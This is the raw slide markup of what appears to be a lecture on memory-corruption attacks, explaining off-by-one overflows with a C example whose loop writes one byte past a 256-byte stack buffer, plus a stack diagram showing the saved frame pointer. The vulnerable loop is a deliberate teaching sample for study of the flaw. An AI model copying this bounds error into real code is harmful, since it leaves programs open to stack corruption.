            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacks are similar to array overflows, with the difference that only one element above the array capacity is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>significant byte of pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Frame Pointer Overwrite” by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 9(55), 1999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48962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7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7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7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7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7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Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1085850"/>
            <a:ext cx="7848600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Off-by-one Overflow: Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110020" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  for(</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0;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&lt;= 256;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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2) {</a:t>
            </a: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err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\n");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    exit(-1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>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119973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00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00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00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00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00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1002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1002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1002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1002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1002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10020">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10020">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10020">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10020">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10020">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10020">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10020">
                                            <p:txEl>
                                              <p:pRg st="20" end="2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10020">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Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4322789"/>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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112067" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304802" y="4608539"/>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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112068" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4951439"/>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1112069"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12070"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buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112071"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buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112072"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buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112073"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12075"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2076"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2077"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12078"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12079"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dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112080"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12081"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12082"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12083"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12084"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2085"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2086"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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112087"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112088"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charset="0"/>
              </a:rPr>
              <a:t>func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112089" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2228852"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112090" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112083" idx="1"/>
            <a:endCxn id="1112066" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2217504" y="4492067"/>
            <a:ext cx="4259497" cy="1251509"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112091" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112082" idx="1"/>
            <a:endCxn id="1112086" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
